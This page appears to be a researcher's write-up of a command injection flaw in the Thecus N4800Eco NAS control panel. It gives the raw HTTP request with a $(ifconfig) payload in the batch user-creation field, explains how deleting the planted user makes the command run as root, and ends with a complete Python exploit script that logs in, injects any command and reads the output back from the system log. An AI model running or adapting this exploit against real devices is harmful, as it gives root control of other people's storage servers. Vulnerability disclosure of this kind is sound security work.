UNSAFE-INLINE
Search…
Thecus N4800Eco Nas Server Control Panel Comand Injection
Command Injection vulnerability that lets attacker for executing command with root privileges.
I have discovered command injection vulnerability on the Thecus N4800Eco Nas Server control panel during penetration test. I could not analyze source code because I didn't have enough time. Hence, I will describe only how vulnerability is detected.

Description

Firstly, I have tried to add user through Local User Configuration, but server didn't accept special chars such as $)( . Also, user and group could be created using Batch Input option that is under the User and Group Authentication section. I set Batch Content as $(ifconfig),22222,9999 that corresponds to username, password and group name.
Request:
1
POST /adm/setmain.php?fun=setbatch HTTP/1.1
2
Host: target
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
4
Accept: */*
5
Accept-Language: en-US,en;q=0.5
6
Accept-Encoding: gzip, deflate
7
Content-Type: application/x-www-form-urlencoded
8
Content-Length: 42
9
Origin: https://target
10
Connection: close
11
Referer: https://target/adm/index.php
12
Cookie: select_md=0; MYSESSID=*
13
14
batch_content=%24(ifconfig)%2C22222%2C9999
Copied!
So that filtering can be bypassed using Batch Content option for adding malicious payload as username. After the user adding process, I sent second request for deleting $(ifconfig) user and Local User remove succeeds response is returned. However the user was not deleted, it is very interesting to me. I tried to understand what happened and noticed that there is a system log section.
Surprisingly I saw that ifconfig command is executed.
For verifying the command injection vulnerability i tried another command such as id
So there is a comman injection vulnerability that lets to execute command with root privilege. Username parameter seems to vulnerable. It is time to write basic Python script.
1
import requests
2
import sys
3
import urllib3
4
5
6
# To fix SSL error that occurs when script is started.
7
# 1- Open /etc/ssl/openssl.cnf file
8
# At the bottom of the file:
9
# [system_default_sect]
10
# MinProtocol = TLSv1.2
11
# CipherString = [email protected]=2
12
# 2- Set value of MinProtocol as TLSv1.0
13
14
15
def readResult(s, target):
16
d = {
17
"fun": "setlog",
18
"action": "query",
19
"params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
20
}
21
url = "https://" + target + "/adm/setmain.php"
22
resultReq = s.post(url, data=d, verify=False)
23
dict = resultReq.text.split()
24
print("[+] Reading system log...\n")
25
#Set your command output range
26
print(dict[5:8])
27
28
def delUser(s, target, command):
29
d = {
30
"action": "delete",
31
"username": "$("+command+")"
32
}
33
url = "https://" + target + "/adm/setmain.php?fun=setlocaluser"
34
delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
35
36
if 'Local User remove succeeds' in delUserReq.text:
37
print('[+] %s command was executed successfully' % command)
38
else:
39
print('[-] %s command was not executed!' %command)
40
sys.exit(1)
41
readResult(s, target)
42
43
def addUser(s, target, command):
44
d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
45
url = "https://" + target + "/adm/setmain.php?fun=setbatch"
46
addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
47
48
if 'Users and groups were created successfully.' in addUserReq.text:
49
print('[+] Users and groups were created successfully')
50
else:
51
print('[-] Users and groups were not created')
52
sys.exit(1)
53
delUser(s, target, command)
54
55
def login(target, username, password, command=None):
56
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
57
s = requests.Session()
58
d = {
59
"&eplang": "english",
60
"p_pass": password,
61
"p_user": username,
62
"username": username,
63
"pwd": password,
64
"action": "login",
65
"option": "com_extplorer"
66
}
67
url = "https://" + target + "/adm/login.php"
68
loginReq = s.post(url, data=d, allow_redirects=False, verify=False)
69
70
if '"success":true' in loginReq.text:
71
print('[+] Authentication successful')
72
elif '"success":false' in loginReq.text:
73
print('[-] Authentication failed!')
74
sys.exit(1)
75
else:
76
print('[-] Something went wrong!')
77
sys.exit(1)
78
addUser(s, target, command)
79
80
def main(args):
81
if len(args) != 5:
82
print("usage: %s targetIp:port username password command" % (args[0]))
83
print("Example 192.168.1.13:80 admin admin id")
84
sys.exit(1)
85
login(target=args[1], username=args[2], password=args[3], command=args[4])
86
87
88
if __name__ == "__main__":
89
main(args=sys.argv)
Copied!
Last modified 4mo ago
Copy link
Contents
Description